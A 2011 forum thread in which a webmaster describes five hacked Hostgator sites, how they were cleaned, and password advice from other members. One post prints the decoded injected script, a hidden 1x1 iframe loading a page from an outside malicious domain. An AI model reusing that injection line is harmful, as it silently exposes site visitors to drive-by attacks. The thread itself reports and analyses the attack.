1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

5 of my Hostgator sites just got hacked

Discussion in 'BlackHat Lounge' started by simey69, Jul 5, 2011.

  1. simey69

    simey69 Regular Member

    Joined:
    Mar 27, 2009
    Messages:
    325
    Likes Received:
    1,478
    Location:
    UK
    Hi,

    Just a warning, I just got hit on 5 of many sites hosted on HG

    Most concern for me was that my main domain got hit, the one that can access WHM also... so adding extra protection around that now

    some sites are handcoded php, others wp, one a mix of handcoded work with wp also.

    There was some encoded javascript inserted at the end of:
    index.htm
    index.php
    index.html
    wp-blog-header.php

    and htaccess got wiped on a few

    they failed as it's throwing a server 500 instead of running.

    I'll open the javascript up later and see what it's upto and report back.

    Support at HG has been spot on, sharing some of the work fixing it.
    They said they,ve seen this yesterday also on another shared hosting account.

    Good luck,

    Si
     
  2. simey69

    simey69 Regular Member

    Joined:
    Mar 27, 2009
    Messages:
    325
    Likes Received:
    1,478
    Location:
    UK
    This is the javascript decoded:

    Code:
    document.write('<iframe src="http://mariacallas.us/forum.php?tp=9b149b234e593d76" width="1" height="1" frameborder="0"></iframe>')
    The site is listed under Godaddy, checking the whois gives:
    Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM

    So at least the tossers site is dead

    Si
     
  3. mccullum

    mccullum Power Member

    Joined:
    Aug 21, 2009
    Messages:
    509
    Likes Received:
    92
    Do let us know how it goes.
     
  4. xstyle

    xstyle Power Member

    Joined:
    Mar 1, 2011
    Messages:
    555
    Likes Received:
    170
    Just going to buy a host at HG.
     
  5. simey69

    simey69 Regular Member

    Joined:
    Mar 27, 2009
    Messages:
    325
    Likes Received:
    1,478
    Location:
    UK
    To be honest - never, ever had an issue with HG before, this has not busted my trust with them.

    To be fair, I'd be quite happy to say I own part blame, as the sites are quite old (5+yrs), so a bit earlier in the day for me as far as security awareness goes and the passwords were not that strong, so probably got brute forced.

    All sites cleaned, passwords changed, no signs of repeat, so all good - no lasting damage done.

    I'd recommend perhaps re-visitng your passwords and making them stronger if needed.

    Thanks,

    Si
     
  6. cashcow

    cashcow Junior Member

    Joined:
    Sep 15, 2008
    Messages:
    162
    Likes Received:
    22
    are u using wordpress? time to update to the latest version.
     
  7. bikerboy

    bikerboy Regular Member

    Joined:
    Nov 18, 2010
    Messages:
    220
    Likes Received:
    148
    Did you share the same passwords for all sites?

    Did you save your passwords in your email (the hacker accessed your email)?
     
  8. xollls

    xollls Junior Member

    Joined:
    Dec 23, 2009
    Messages:
    187
    Likes Received:
    48
    Location:
    SoCal
    Did you install any nulled scripts? Many contain backdoors.
     
  9. simey69

    simey69 Regular Member

    Joined:
    Mar 27, 2009
    Messages:
    325
    Likes Received:
    1,478
    Location:
    UK
    Two are WP sites, up to date
    Two are hand coded php
    one was a mix of handcoded with WP in the back.
    WP was not a cause here, the access was at a ftp/cpanel level

    Nope - always individual passwords per site.
    But as mentioned, they where 'softer' passwords, now changed to what WHM classes as '100/100 Strong'
    Nope - I never have passwords in emails, nor send them via email anywhere.

    Nope - I would never used them without manually going through them myself first.
    I do a fair bit of coding/decoding/nulling, so quite careful in such respects.

    If it had been a local issue relating to pc etc, then many (many!!) more would've been hit, on other hosts too.

    The attack was automated for sure - the timing of file updates was too quick to be manual.
    Basically it looks like the sites cpanel access (maybe ftp) was brute forced, then the folders crawled looking for index.(htm/html/php) login.(htm/html/php) and wp-blog-header.php. A few had the .htaccess cleared too, but not all.

    I'm confident it was related to soft passwords, that had not been updated over time and over-looked from a security perspective.
    HG support said they'd seen this the same attack on another shared account the day before - I think somebody is brute forcing them.

    Thanks
    Si
     
  10. blogdev

    blogdev BANNED BANNED

    Joined:
    Sep 29, 2009
    Messages:
    128
    Likes Received:
    101
    Got some site hacked on HG too, never had a problem before i move my site there, I'm no longer using them.
     
  11. simey69

    simey69 Regular Member

    Joined:
    Mar 27, 2009
    Messages:
    325
    Likes Received:
    1,478
    Location:
    UK
    yeah, I gotta be fair to them, been with them for almost 7yrs I think.

    Never had an issue before, as above, the only thing I can see is soft'ish password use on my side.

    On their side, I would've expected some level of protection against repeated type of brute-forcing of log-ins

    Si
     
  12. timothywcrane

    timothywcrane Power Member

    Joined:
    Apr 25, 2009
    Messages:
    590
    Likes Received:
    236
    Occupation:
    Internet Promotion Management
    Location:
    USA
    Home Page:
    Never do that, and if you have, never tell anyone in a forum or other conversation that you have, even if just in the past. This is hacking also (not accusing poster I quoted), social rengineering.

    A mark as a mark is a mark. It doesn't matter if it's on the street, in business, or on a sever.

    To OP, glad to hear that no perm damage was done, and thanks to the poster I quoted, as it brings up a great point.
     
  13. boosters

    boosters Regular Member

    Joined:
    Mar 27, 2011
    Messages:
    225
    Likes Received:
    62
    One of my site also hacked but HG done this so quickly that google unable to find whether the site was hacked or not. So if anyone the site was hacked, contact the HG live support immediately for better assistance/.
     
  14. RightInTwo

    RightInTwo Power Member

    Joined:
    Feb 23, 2010
    Messages:
    744
    Likes Received:
    381
    Home Page:
    Is it shared hosting? Sometimes your neighbor can get hacked and you get taken out with them.
     
  15. Evan257

    Evan257 Regular Member

    Joined:
    May 24, 2009
    Messages:
    401
    Likes Received:
    54
    Location:
    Toronto ON
    Happened to me a month ago with Hostgator. One of my microniche mfa sites slipped to the second page. :(
    I bet it was wordpress right?